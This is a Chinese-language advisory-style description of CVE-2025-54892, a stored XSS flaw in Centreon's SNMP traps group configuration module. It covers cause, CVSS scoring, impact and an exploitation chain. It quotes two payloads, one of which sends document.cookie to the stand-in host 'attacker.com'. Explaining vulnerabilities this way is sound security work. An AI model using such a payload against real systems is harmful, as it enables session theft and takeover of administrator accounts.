CVE-2025-54892CVE-2025-54892是Centreon Infra Monitoring平台SNMP traps组配置模块中存在的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞源于Web页面生成过程中对用户输入未能进行充分的中和化处理(Improper Neutralization of Input),属于CWE-79类漏洞。Centreon是一款广泛使用的开源IT基础设施监控软件,被众多企业用于网络、服务器和应用的集中监控管理。该漏洞允许具有提升权限的用户(如管理员或具有配置权限的操作员)在SNMP traps组配置模块中注入恶意的JavaScript脚本或HTML代码。这些恶意载荷会被持久化存储在服务端数据库中,每当其他用户(包括高权限管理员)访问相关配置页面时,恶意脚本将在受害者浏览器中自动执行。由于漏洞的存储型特性,攻击影响范围广且持续时间长。CVSS 3.1评分为6.8分,属于中危级别,其向量表明该漏洞通过网络利用、需要高权限认证、无需用户交互、范围变更、对机密性影响较高。Centreon官方已发布安全公告,建议用户尽快升级到修复版本以消除风险。
该漏洞存在于Centreon Infra Monitoring的SNMP traps group configuration模块中。当具有提升权限的用户在配置SNMP陷阱组时,应用程序未能对用户提交的输入字段(如组名称、描述、OID等配置参数)进行充分的HTML/JavaScript编码或过滤。攻击者可以在这些输入字段中插入恶意脚本代码,例如:<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。由于缺乏输出编码(Output Encoding),恶意载荷被直接存储到后端数据库中。当其他用户(尤其是管理员)查看SNMP traps配置页面时,服务器从数据库中读取并将这些未净化的数据嵌入到HTML响应中返回给浏览器,浏览器将其解析为可执行脚本。攻击者可以利用此漏洞窃取管理员会话Cookie、执行未授权操作、进行权限提升、植入Webshell后门,或通过管理员权限进一步渗透整个监控系统。由于漏洞需要高权限认证(PR:H),普通用户无法直接利用,但一旦管理员被诱骗或被社工访问恶意页面,将造成严重的安全后果。漏洞利用链通常涉及:1)攻击者获取具有配置权限的账户;2)在SNMP traps配置中注入XSS载荷;3)等待管理员访问配置页面触发脚本执行;4)窃取会话或执行特权操作。